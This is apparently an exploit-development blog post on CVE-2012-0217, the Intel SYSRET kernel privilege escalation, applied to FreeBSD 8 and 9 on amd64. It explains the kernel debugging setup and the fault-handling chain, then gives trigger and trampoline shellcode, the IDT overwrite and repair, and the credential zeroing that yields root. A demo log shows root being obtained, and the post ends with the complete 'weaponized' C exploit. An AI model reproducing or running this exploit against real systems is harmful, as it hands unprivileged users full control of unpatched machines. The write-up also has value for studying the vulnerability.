CVE-2012-0217: Intel's sysret Kernel Privilege Escalation (on FreeBSD)
CVE-2012-0217 was reported by Rafal Wojtczuk but ironically, it was fixed for Linux in 2006 as shown by CVE-2006-0744 without receiving much attention.
It is quite an interesting vulnerability on many aspects. Among them, and thanks to its hardware basis, it impacts many operating systems. For instance, as long as they run on a Intel processor in long mode (obviously), FreeBSD, NetBSD, Solaris, Xen and Microsoft Windows have been reported to be vulnerable. This therefore gives us quite an incentive to develop an exploit ;).
If you haven’t yet read Xen’s blog post The Intel SYSRET privilege escalation please do because we won’t go again into too much details about the vulnerability itself.
Without further delay, let’s dig right into the FreeBSD exploitation!
Overview
While developing an exploit, it helps to mentally take note or write down a TODO-list and/or roadmap to a successful exploitation. Here is one, sorted by exploitation chronological order:
- A way to debug the kernel! (You really think one shot is all it takes? ;) )
- Information gathering
- Code to trigger the vulnerability
- Getting arbitrary code execution
- Keeping the kernel stable
- Recovering from the general page fault exception (#GP)
- Privilege escalation
- Giving back a shellcode to the user
- (3) Profit ;)
Of course this is not necessarily the order you follow when trying to come up with ideas to solve them. You don’t always (often?) even have a full roadmap until you actually come up with random ideas, ideas which slowly gather, start to make sense and flow together.
Kernel debugging
This is one of the most important items. Having a good debugging environment goes a long way toward a successful exploitation.
Many configurations could work, in this case, we run and debug the target OS (FreeBSD) under VMware Fusion on Mac OS X.
Indeed, VMware provides an easy way to debug the guest OS through a debug stub. Enabling it is easy, you just need to edit the .vmx
file you’ll find inside your VMware’s VM (Right Click->Show Package Contents), and add the following line:
debugStub.listen.guest64 = "TRUE"
With this magic configuration line, VMware listens to the port 8864 and you therefore now are able to debug your VM’s OS using the gdb’s target command
(gdb) target remote localhost:8864
But to be useful we need to configure and cross-compile GDB for the FreeBSD target environment (amd64-marcel-freebsd), enabling us to load the FreeBSD’s kernel symbols into gdb. This requires gettext, gmp, and libelf but you can use MacPorts to install them.
As an example, using gdb 7.4.1:
% sudo port install gettext gmp libelf
[...]
% curl -O http://ftp.gnu.org/gnu/gdb/gdb-7.4.1.tar.bz2
[...]
% tar xvjf gdb-7.4.1.tar.bz2
[...]
% cd % cd gdb-7.4.1
gdb-7.4.1 % CFLAGS=-I/opt/local/include ./configure --prefix=/opt/local --program-suffix=-amd64-marcel-freebsd --target=amd64-marcel-freebsd
[...]
gdb-7.4.1 % make
[...]
gdb-7.4.1 % make install
And finally, just copy the FreeBSD’s /usr/src
and /boot/kernel/
directories to Mac OS X.
And voila, you’re set!
% ls
kernel/ usr/
% gdb-amd64-marcel-freebsd -q -tui kernel/kernel
┌──Register group: general─────────────────────────────────────────────┐
│rax 0x0 0 │
│rbx 0x0 0 │
│rcx 0x100b 4107 │
│rdx 0x1008 4104 │
│rsi 0xffffff80001f6b54 -549753754796 │
│rdi 0x1008 4104 │
│rbp 0xffffff80001f6b30 0xffffff80001f6b30 │
│rsp 0xffffff80001f6b30 0xffffff80001f6b30 │
│r8 0x0 0 │
│r9 0x0 0 │
│r10 0x2 2 │
│r11 0xffffffff8022fdb0 -2145190480 │
│r12 0xffffff0002286200 -1099475426816 │
│r13 0xffffff0002286228 -1099475426776 │
┌──/usr/src/sys/amd64/acpica/acpi_machdep.c─────────────────────────┐
│96 { │
│97 return (0); │
│98 } │
│99 │
│100 void │
│101 acpi_cpu_c1() │
│102 { │
│103 __asm __volatile("sti; hlt"); │
>│104 } │
│105 │
│106 /* │
│107 * Support for mapping ACPI tables during early boot. Curr│
│108 * uses the crashdump map to map each table. However, the │
│109 * map is created in pmap_bootstrap() right after the direc│
└───────────────────────────────────────────────────────────────────┘
remote Thread 1 In: acpi_cpu_c1 Line: 104 PC: 0xffffffff8092d1d6
Reading symbols from kernel/kernel...done.
(gdb) target remote localhost:8864
Remote debugging using localhost:8864
acpi_cpu_c1 () at /usr/src/sys/amd64/acpica/acpi_machdep.c:104
(gdb)
NB: you can change the -tui layout using ctrl+x 2
multiple times
One warning though: you can’t easily step through anything. For instance, if you single-step through the function Xfast_syscall
[1], the code
cli
testl $PCB_FULL_IRET,PCB_FLAGS(%rax)
would detect it needs a full iret
and won’t use the sysret
instruction.
The trick is therefore to set your breakpoints directly at the #GP’s and/or doublefault’s handlers (resp. Xprot()
[2] and Xdblfault()
[3]), which are triggered right after the sysret
instruction execution. From there, you won’t have troubles single stepping and you’ll even see the page fault triggers once the kernel try to access some gs:data
(we’ll see why soon enough).
Information gathering
During exploitation, we need a few kernel symbol addresses. Under FreeBSD we’re in luck: the kldsym()
function provides an easy way for symbol lookups as shown by the following get_symaddr()
function.
u_long get_symaddr(char *symname)
{
struct kld_sym_lookup ksym;
ksym.version = sizeof (ksym);
ksym.symname = symname;
if (kldsym(0, KLDSYM_LOOKUP, &ksym) < 0) {
perror("kldsym");
exit(1);
}
printf(" [+] Resolved %s to %#lx\n", ksym.symname, ksym.symvalue);
return ksym.symvalue;
}
Vulnerability Triggering
Triggering the vulnerability is easy:
- Allocate a page just before the non-canonical address boundary 0x0000800000000000
- Call an arbitrary syscall using the
syscall
instruction right before the non-canonical address boundary
When the fastsyscall handler restores the user’s registers, executes sysret
and therefore tries to return to the “next instruction” at 0x0000800000000000, on Intel’s processors, a #GP is triggered while still in kernel mode. Furthermore, an exception frame is pushed to the stack, which now happens to be the userland’s stack. Thus, we can trigger a kernel write to a location which is user controlled!
Hence, the following triggering code
uint64_t pagesize = getpagesize();
uint8_t * area = (uint8_t*)((1ULL << 47) - pagesize);
area = mmap(area, pagesize,
PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0);
if (area == MAP_FAILED) {
perror("mmap (trigger)");
exit(1);
}
// Copy the trigger code at the end of the page
// such that the syscall instruction is at its
// boundary
char triggercode[] =
"\xb8\x18\x00\x00\x00" // mov rax, 24; #getuid
"\x48\x89\xe3" // mov rbx, rsp; save the user's stack for later
"\x48\xbc\xbe\xba\xfe\xca\xde\xc0\xad\xde" // mov rsp, 0xdeadc0decafebabe
"\x0f\x05"; // syscall
uint8_t * trigger_addr = area + pagesize - TRIGGERCODESIZE;
memcpy(trigger_addr, triggercode, TRIGGERCODESIZE);
The question now is, what do we set rsp
to?
Follow the white rabbit…
Arbitrary code execution
There are two outcomes given a target rsp
:
- if rsp can’t be written to, a double fault is triggered (
Xdblfault()
[3]) and the exception frame is pushed to a special stack - otherwise a #GP is triggered (
Xprot()
[2]) and the exception frame is pushed to[rsp]
In the latter case, the trouble is (or is it?)… The #GP triggers a page fault (Xpage()
[4]). Let’s see why.
IDTVEC(prot)
subq $TF_ERR,%rsp
movl $T_PROTFLT,TF_TRAPNO(%rsp) [1]
movq $0,TF_ADDR(%rsp) [2]
movq %rdi,TF_RDI(%rsp) /* free up a GP register */ [3]
leaq doreti_iret(%rip),%rdi
cmpq %rdi,TF_RIP(%rsp)
je 1f /* kernel but with user gsbase!! */
testb $SEL_RPL_MASK,TF_CS(%rsp) /* Did we come from kernel? */ [4]
jz 2f /* already running with kernel GS.base */
1: swapgs
2: movq PCPU(CURPCB),%rdi [5]
[4] sets the Z
flag because we come from the kernel (while executing sysret
) and we therefore skip the swapgs
instruction. But in this particular chain of event, GS
is in fact the user’s GS.base
! Indeed it was restored just before calling sysret
… Hence, accessing gs:data
at [5] triggers a page fault (Xpage()
[4]).
If we don’t do anything we’ll eventually doublefault, tripplefault etc. and crash miserably.
We therefore need a way:
- to recover from the #GP
- to clean any mess we did/overwrote
Both could be solved if we can get get an arbitrary code execution by the time we reach [5]. (NB: this is not mandatory, we could get the code execution later down the fault trigger chain)
So… here is the idea: wouldn’t it be nice if we could overwrite the page fault handler’s address and therefore get code execution when [5] triggers the #PF?
Yes indeed, and that’s how we’re going to exploit it :-)
First a few structures for reference:
Gate descriptor:
+0: Target Offset[15:0] | Target Selector
+4: Some stuff | Target Offset[31:16]
+8: Target Offset[63:32]
+12: Some more stuff
and from include/frame.h
:
struct trapframe {
register_t tf_rdi;
register_t tf_rsi;
register_t tf_rdx;
register_t tf_rcx;
register_t tf_r8;
register_t tf_r9;
register_t tf_rax;
register_t tf_rbx;
register_t tf_rbp;
register_t tf_r10;
register_t tf_r11;
register_t tf_r12;
register_t tf_r13;
register_t tf_r14;
register_t tf_r15;
uint32_t tf_trapno;
uint16_t tf_fs;
uint16_t tf_gs;
register_t tf_addr;
uint32_t tf_flags;
uint16_t tf_es;
uint16_t tf_ds;
/* below portion defined in hardware */
register_t tf_err;
register_t tf_rip;
register_t tf_cs;
register_t tf_rflags;
register_t tf_rsp;
register_t tf_ss;
};
When the exception is triggered, the hardware pushes ss
, rsp
, rflags
, cs
, rip
and err
.
We can see that [1], [2] and [3] write to the stack.
[3] is fully user-controlled through
rdi
, so we could try to alignrsp
such that [3] overwrites the #PF’s offset address.The trouble is…
rsp
is automatically 16-byte aligned when an exception is triggered. We can therefore only overwrite the first 32-LSB of the offset address (check howrdi
is 16byte aligned in this trapframe if you don’t understand why).[2] writes 0 to
tf_addr
which is also 16-byte aligned. So no dice.That leaves us with [1] which writes T_PROTFLT (0x9) to
tf_trapno
andtf_trapno
is 16-byte aligned + 8! This enables us to setTarget Offset[63:32]
to 0x9.
Thus, if we set rsp
to &idt[14] + 10*8
(to align tf_trapno
with the #PF’s Target Offset[63:32]
), we can set the #PF handler’s address to 0x9WWXXYYZZ.
Furthermore, WWXXYYZZ is known since we can get the #PF’s address through get_symaddr()
. To get an arbitrary code execution, the idea is therefore to setup a trampoline code at 0x9WWXXYYZZ, which contains some setup code and a jump to our kernel mode payload (pointed by rax
in the following code).
*(uint64_t*)(trigger_addr + 10) = (uint64_t)(((uint8_t*)&sidt()[14]) + 10 * 8);
char trampolinecode[] =
"\x0f\x01\xf8" // swapgs; switch back to the kernel's GS.base
"\x48\x89\xdc" // mov rsp, rbx; restore rsp, it's enough to use the user's stack
"\x48\xb8\xbe\xba\xfe\xca\xde\xc0\xad\xde" // mov rax, 0xdeadc0decafebabe
"\xff\xe0"; // jmp rax
uint8_t * trampoline = (uint8_t*)(0x900000000 | (Xpage_ptr & 0xFFFFFFFF));
size_t trampoline_allocsize = pagesize;
// We round the address to the PAGESIZE for the allocation
// Not enough space for the trampoline code ?
if ((uint8_t*)((uint64_t)trampoline & ~(pagesize-1)) + pagesize < trampoline + TRAMPOLINECODESIZE)
trampoline_allocsize += pagesize;
if (mmap((void*)((uint64_t)trampoline & ~(pagesize-1)), trampoline_allocsize,
PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0) == MAP_FAILED)
{
perror("mmap (trampoline)");
exit(1);
}
memcpy(trampoline, trampolinecode, TRAMPOLINECODESIZE);
*(uint64_t*)(trampoline + 8) = (uint64_t)kernelmodepayload;
Keeping the kernel stable
Getting a root shell and crashing after 1us is not fun, isn’t it? We’d better restore whatever we overwrote in the kernel space while trying to achieve code execution…
Let’s summarize what we smashed with rsp
initialized to idt[14] + 10*8
, i.e. idt[19]
:
- The #GP exception frame writes 6*64bit registers, i.e. it overwrites
idt[18]
,idt[17]
andidt[16]
tf_addr
overwrites the 64-LSB ofidt[15]
tf_trapno
overwrites theTarget Offset[63:32]
field ofidt[14]
rdi
overwrites the 64-LSB ofidt[7]
- The #PF exception frame overwrites
idt[6]
,idt[5]
andidt[4]
Thus overall, the IDT’s entries 4, 5, 6, 7, 14, 15, 16, 17, and 18 need to be restored and we should be safe.
struct gate_descriptor *idt = sidt();
setidt(idt, IDT_OF, Xofl_ptr, SDT_SYSIGT, SEL_KPL, 0); // 4
setidt(idt, IDT_BR, Xbnd_ptr, SDT_SYSIGT, SEL_KPL, 0); // 5
setidt(idt, IDT_UD, Xill_ptr, SDT_SYSIGT, SEL_KPL, 0); // 6
setidt(idt, IDT_NM, Xdna_ptr, SDT_SYSIGT, SEL_KPL, 0); // 7
setidt(idt, IDT_PF, Xpage_ptr, SDT_SYSIGT, SEL_KPL, 0); // 14
setidt(idt, IDT_MF, Xfpu_ptr, SDT_SYSIGT, SEL_KPL, 0); // 15
setidt(idt, IDT_AC, Xalign_ptr, SDT_SYSIGT, SEL_KPL, 0); // 16
setidt(idt, IDT_MC, Xmchk_ptr, SDT_SYSIGT, SEL_KPL, 0); // 17
setidt(idt, IDT_XF, Xxmm_ptr, SDT_SYSIGT, SEL_KPL, 0); // 18
Privilege escalation
This part is quite standard and easy, we just need to retrieve the current user credentials struct’s address, and set the various IDs to 0 (root).
Knowing that the current thread struct’s address can be read from gs:0
uder FreeBSD, this yields to the following code.
struct thread *td;
struct ucred *cred;
// get the thread pointer
asm ("mov %%gs:0, %0" : "=r"(td));
// The Dark Knight Rises
cred = td->td_proc->p_ucred;
cred->cr_uid = cred->cr_ruid = cred->cr_rgid = 0;
cred->cr_groups[0] = 0;
Shellcode
Finally… We return to our userland shellcode using the sysret
instruction.
// return to user mode to spawn the shell
asm ("swapgs; sysretq;" :: "c"(shellcode)); // store the shellcode addr to rcx
And the shellcode? What shellcode? :P
The user credentials struct is cached/shared among the user’s processes. Since we modified it, the caller’s shell will automagically inherit from this privilege escalation.
Hence the following shellcode ;-)
void shellcode()
{
// Actually we dont really need to spawn a shell since we
// changed our whole cred struct.
// Just exit...
printf("[*] Got root!\n");
exit(0);
}
Demo
$ uname -a
FreeBSD FreeBSD 9.0 64bit 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo. edu:/usr/obj/usr/src/sys/GENERIC amd64
$ id
uid=1001(qwerty) gid=1001(qwerty) groups=1001(qwerty)
$ ls -l
total 24
-rwxr-xr-x 1 qwerty qwerty 11693 Jul 5 17:49 CVE-2012-0217
-rw-r--r-- 1 qwerty qwerty 10763 Jul 5 17:49 CVE-2012-0217.c
$ ./CVE-2012-0217
CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)
[*] Retrieving host information...
[+] CPU: GenuineIntel
[+] sysname: FreeBSD
[+] release: 9.0-RELEASE
[+] version: FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo. edu:/usr/obj/usr/src/sys/GENERIC
[+] machine: amd64
[*] Validating target OS and version...
[+] Vulnerable :-)
[*] Resolving kernel addresses...
[+] Resolved Xofl to 0xffffffff80b02e70
[+] Resolved Xbnd to 0xffffffff80b02ea0
[+] Resolved Xill to 0xffffffff80b02ed0
[+] Resolved Xdna to 0xffffffff80b02f00
[+] Resolved Xpage to 0xffffffff80b03240
[+] Resolved Xfpu to 0xffffffff80b02fc0
[+] Resolved Xalign to 0xffffffff80b03080
[+] Resolved Xmchk to 0xffffffff80b02f60
[+] Resolved Xxmm to 0xffffffff80b02ff0
[*] Setup...
[+] Trigger code...
[+] Trampoline code...
[*] Fire in the hole!
[*] Got root!
$ id
uid=0(root) gid=0(wheel) groups=0(wheel)
Final words
The final exploit is quite stable, nicely recovers and exit back to the user’s shell. It works on both FreeBSD 8 and 9 (and probably 7) as-is with the stock kernels without any need for special magic hardcoded values; but of course the environment could be hardened.
To conclude: the mandatory video :-)
And… That’s a wrap!
Hope you enjoyed it. Feel free to comment or discuss other exploitation paths.
[1] Xfast_syscall
is defined in sys/amd64/amd64/exception.S
[2] Xprot
is defined in sys/amd64/amd64/exception.S
[3] Xdblfault
is defined in sys/amd64/amd64/exception.S
[4] Xpage
is defined in sys/amd64/amd64/exception.S
The full weaponized exploit
also available on github
// CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)
// Copyright 2012 all right reserved, not for commercial uses, bitches
// Infringement Punishment: Monkeys coming out of your ass Bruce Almighty style.
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/utsname.h>
#include <machine/cpufunc.h>
#define _WANT_UCRED
#include <sys/proc.h>
#include <machine/segments.h>
#include <sys/param.h>
#include <sys/linker.h>
uintptr_t Xofl_ptr, Xbnd_ptr, Xill_ptr, Xdna_ptr, Xpage_ptr, Xfpu_ptr, Xalign_ptr, Xmchk_ptr, Xxmm_ptr;
struct gate_descriptor * sidt()
{
struct region_descriptor idt;
asm ("sidt %0": "=m"(idt));
return (struct gate_descriptor*)idt.rd_base;
}
u_long get_symaddr(char *symname)
{
struct kld_sym_lookup ksym;
ksym.version = sizeof (ksym);
ksym.symname = symname;
if (kldsym(0, KLDSYM_LOOKUP, &ksym) < 0) {
perror("kldsym");
exit(1);
}
printf(" [+] Resolved %s to %#lx\n", ksym.symname, ksym.symvalue);
return ksym.symvalue;
}
// Code taken from amd64/amd64/machdep.c
void setidt(struct gate_descriptor *idt, int idx, uintptr_t func, int typ, int dpl, int ist)
{
struct gate_descriptor *ip;
ip = idt + idx;
ip->gd_looffset = func;
ip->gd_selector = GSEL(GCODE_SEL, SEL_KPL);
ip->gd_ist = ist;
ip->gd_xx = 0;
ip->gd_type = typ;
ip->gd_dpl = dpl;
ip->gd_p = 1;
ip->gd_hioffset = func>>16;
}
void shellcode()
{
// Actually we dont really need to spawn a shell since we
// changed our whole cred struct.
// Just exit...
printf("[*] Got root!\n");
exit(0);
}
void kernelmodepayload()
{
struct thread *td;
struct ucred *cred;
// We need to restore/recover whatever we smashed
// We inititalized rsp to idt[14] + 10*8, i.e. idt[19] (see trigger())
// The #GP exception frame writes 6*64bit registers, i.e. it overwrites
// idt[18], idt[17] and idt[16]
// thus overall we have:
// - idt[18], idt[17] and idt[16] are trashed
// - tf_addr -> overwrites the 64bit-LSB of idt[15]
// - tf_trapno -> overwrites Target Offset[63:32] of idt[14]
// - rdi -> overwrites the 64bit-LSB of idt[7]
// - #PF exception frame overwrites idt[6], idt[5] and idt[4]
struct gate_descriptor *idt = sidt();
setidt(idt, IDT_OF, Xofl_ptr, SDT_SYSIGT, SEL_KPL, 0); // 4
setidt(idt, IDT_BR, Xbnd_ptr, SDT_SYSIGT, SEL_KPL, 0); // 5
setidt(idt, IDT_UD, Xill_ptr, SDT_SYSIGT, SEL_KPL, 0); // 6
setidt(idt, IDT_NM, Xdna_ptr, SDT_SYSIGT, SEL_KPL, 0); // 7
setidt(idt, IDT_PF, Xpage_ptr, SDT_SYSIGT, SEL_KPL, 0); // 14
setidt(idt, IDT_MF, Xfpu_ptr, SDT_SYSIGT, SEL_KPL, 0); // 15
setidt(idt, IDT_AC, Xalign_ptr, SDT_SYSIGT, SEL_KPL, 0); // 16
setidt(idt, IDT_MC, Xmchk_ptr, SDT_SYSIGT, SEL_KPL, 0); // 17
setidt(idt, IDT_XF, Xxmm_ptr, SDT_SYSIGT, SEL_KPL, 0); // 18
// get the thread pointer
asm ("mov %%gs:0, %0" : "=r"(td));
// The Dark Knight Rises
cred = td->td_proc->p_ucred;
cred->cr_uid = cred->cr_ruid = cred->cr_rgid = 0;
cred->cr_groups[0] = 0;
// return to user mode to spawn the shell
asm ("swapgs; sysretq;" :: "c"(shellcode)); // store the shellcode addr to rcx
}
#define TRIGGERCODESIZE 20
#define TRAMPOLINECODESIZE 18
void trigger()
{
printf("[*] Setup...\n");
// Allocate one page just before the non-canonical address
printf(" [+] Trigger code...\n");
uint64_t pagesize = getpagesize();
uint8_t * area = (uint8_t*)((1ULL << 47) - pagesize);
area = mmap(area, pagesize,
PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0);
if (area == MAP_FAILED) {
perror("mmap (trigger)");
exit(1);
}
// Copy the trigger code at the end of the page
// such that the syscall instruction is at its
// boundary
char triggercode[] =
"\xb8\x18\x00\x00\x00" // mov rax, 24; #getuid
"\x48\x89\xe3" // mov rbx, rsp; save the user's stack for later
"\x48\xbc\xbe\xba\xfe\xca\xde\xc0\xad\xde" // mov rsp, 0xdeadc0decafebabe
"\x0f\x05"; // syscall
uint8_t * trigger_addr = area + pagesize - TRIGGERCODESIZE;
memcpy(trigger_addr, triggercode, TRIGGERCODESIZE);
// There are two outcomes given a target rsp:
// - if rsp can't be written to, a double fault is triggered
// (Xdblfault defined in sys/amd64/amd64/exception.S)
// and the exception frame is pushed to a special stack
// - otherwise a #GP is triggered
// (Xprot defined in sys/amd64/amd64/exception.S)
// and the exception frame is pushed to [rsp]
//
// In the latter case, trouble is... #GP triggers a page fault
// (Xpage):
// IDTVEC(prot)
// subq $TF_ERR,%rsp
// [1] movl $T_PROTFLT,TF_TRAPNO(%rsp)
// [2] movq $0,TF_ADDR(%rsp)
// [3] movq %rdi,TF_RDI(%rsp) /* free up a GP register */
// leaq doreti_iret(%rip),%rdi
// cmpq %rdi,TF_RIP(%rsp)
// je 1f /* kernel but with user gsbase!! */
// [4] testb $SEL_RPL_MASK,TF_CS(%rsp) /* Did we come from kernel? */
// jz 2f /* already running with kernel GS.base */
// 1: swapgs
// 2: movq PCPU(CURPCB),%rdi [5]
//
// [4] sets the Z flag because we come from the kernel (while executing sysret)
// and we therefore skip swapgs. But GS is in fact the user GS.base! Indeed
// it was restored just before calling sysret...
// Thus, [5] triggers a pagefault while trying to access gs:data
// If we don't do anything we'll eventually doublefault, tripplefault etc. and crash
//
// We therefore need a way: (1) to recover from the GP, (2) to clean
// any mess we did. Both could be solved if we can get get an arbitrary
// code execution by the time we reach [5] (NB: this is not mandatory, we could
// get the code execution later down the fault trigger chain)
//
// So... here is the idea: wouldn't it be nice if we could overwrite the
// page fault handler's address and therefore get code execution when [5]
// triggers the #PF?
//
// For reference:
// Gate descriptor:
// +0: Target Offset[15:0] | Target Selector
// +4: Some stuff | Target Offset[31:16]
// +8: Target Offset[63:32]
// +12: Stuff
//
// and from include/frame.h:
// struct trapframe {
// register_t tf_rdi;
// register_t tf_rsi;
// register_t tf_rdx;
// register_t tf_rcx;
// register_t tf_r8;
// register_t tf_r9;
// register_t tf_rax;
// register_t tf_rbx;
// register_t tf_rbp;
// register_t tf_r10;
// register_t tf_r11;
// register_t tf_r12;
// register_t tf_r13;
// register_t tf_r14;
// register_t tf_r15;
// uint32_t tf_trapno;
// uint16_t tf_fs;
// uint16_t tf_gs;
// register_t tf_addr;
// uint32_t tf_flags;
// uint16_t tf_es;
// uint16_t tf_ds;
// /* below portion defined in hardware */
// register_t tf_err;
// register_t tf_rip;
// register_t tf_cs;
// register_t tf_rflags;
// register_t tf_rsp;
// register_t tf_ss;
// };
//
// When the exception is triggered, the hardware pushes
// ss, rsp, rflags, cs, rip and err
//
// We can see that [1], [2] and [3] write to the stack
// [3] is fully user-controlled through rdi, so we could try to align
// rsp such that [3] overwrites the offset address
//
// The trouble is... rsp is 16byte aligned for exceptions. We can
// therefore only overwrite the first 32-LSB of the offset address
// (check how rdi is 16byte aligned in this trapframe)
//
// [2] writes 0 to tf_addr which is also 16byte aligned. So no dice.
// That leaves us with [1] which writes T_PROTFLT (0x9) to tf_trapno
// and tf_trapno is 16byte aligned + 8!
// This enables us to set Target Offset[63:32] to 0x9
//
// We set rsp to &idt[14] + 10 * 8 (to align tf_trapno with Offset[63:32])
*(uint64_t*)(trigger_addr + 10) = (uint64_t)(((uint8_t*)&sidt()[14]) + 10 * 8);
// Hence, the #PF handler's address is now 0x9WWXXYYZZ
// Furthermore, WWXXYYZZ is known since we can get (see get_symaddr()) the #PF's address
// Thus, the idea is to setup a trampoline code at 0x9WWXXYYZZ which does
// some setup and jump to our kernel mode code
printf(" [+] Trampoline code...\n");
char trampolinecode[] =
"\x0f\x01\xf8" // swapgs; switch back to the kernel's GS.base
"\x48\x89\xdc" // mov rsp, rbx; restore rsp, it's enough to use the user's stack
"\x48\xb8\xbe\xba\xfe\xca\xde\xc0\xad\xde" // mov rax, 0xdeadc0decafebabe
"\xff\xe0"; // jmp rax
uint8_t * trampoline = (uint8_t*)(0x900000000 | (Xpage_ptr & 0xFFFFFFFF));
size_t trampoline_allocsize = pagesize;
// We round the address to the PAGESIZE for the allocation
// Not enough space for the trampoline code ?
if ((uint8_t*)((uint64_t)trampoline & ~(pagesize-1)) + pagesize < trampoline + TRAMPOLINECODESIZE)
trampoline_allocsize += pagesize;
if (mmap((void*)((uint64_t)trampoline & ~(pagesize-1)), trampoline_allocsize,
PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0) == MAP_FAILED)
{
perror("mmap (trampoline)");
exit(1);
}
memcpy(trampoline, trampolinecode, TRAMPOLINECODESIZE);
*(uint64_t*)(trampoline + 8) = (uint64_t)kernelmodepayload;
// Call it
printf("[*] Fire in the hole!\n");
((void (*)())trigger_addr)();
}
typedef struct validtarget
{
char * sysname;
char * release;
char * machine;
} validtarget_t;
int validate_target(char * sysname, char * release, char * machine)
{
validtarget_t targets[] = {
{ "FreeBSD", "8.3-RELEASE", "amd64" },
{ "FreeBSD", "9.0-RELEASE", "amd64" },
{ 0, 0, 0 }
};
int found = 0;
int i = 0;
while (!found && targets[i].sysname) {
found = !strcmp(targets[i].sysname, sysname)
&& !strcmp(targets[i].release, release)
&& !strcmp(targets[i].machine, machine);
++i;
}
return found;
}
void get_cpu_vendor(char * cpu_vendor)
{
u_int regs[4];
do_cpuid(0, regs);
((u_int *)cpu_vendor)[0] = regs[1];
((u_int *)cpu_vendor)[1] = regs[3];
((u_int *)cpu_vendor)[2] = regs[2];
cpu_vendor[12] = '\0';
}
int is_intel()
{
char cpu_vendor[13];
get_cpu_vendor(cpu_vendor);
return !strcmp(cpu_vendor, "GenuineIntel");
}
int main(int argc, char *argv[])
{
printf("CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)\n\n");
printf("[*] Retrieving host information...\n");
char cpu_vendor[13];
get_cpu_vendor(cpu_vendor);
struct utsname ver;
uname(&ver);
printf(" [+] CPU: %s\n", cpu_vendor);
printf(" [+] sysname: %s\n", ver.sysname);
printf(" [+] release: %s\n", ver.release);
printf(" [+] version: %s\n", ver.version);
printf(" [+] machine: %s\n", ver.machine);
printf("[*] Validating target OS and version...\n");
if (!is_intel() || !validate_target(ver.sysname, ver.release, ver.machine)) {
printf(" [+] NOT Vulnerable :-(\n");
exit(1);
} else
printf(" [+] Vulnerable :-)\n");
// Prepare the values we'll need to restore the kernel to a stable state
printf("[*] Resolving kernel addresses...\n");
Xofl_ptr = (uintptr_t)get_symaddr("Xofl");
Xbnd_ptr = (uintptr_t)get_symaddr("Xbnd");
Xill_ptr = (uintptr_t)get_symaddr("Xill");
Xdna_ptr = (uintptr_t)get_symaddr("Xdna");
Xpage_ptr = (uintptr_t)get_symaddr("Xpage");
Xfpu_ptr = (uintptr_t)get_symaddr("Xfpu");
Xalign_ptr = (uintptr_t)get_symaddr("Xalign");
Xmchk_ptr = (uintptr_t)get_symaddr("Xmchk");
Xxmm_ptr = (uintptr_t)get_symaddr("Xxmm");
// doeet!
trigger();
return 0;
}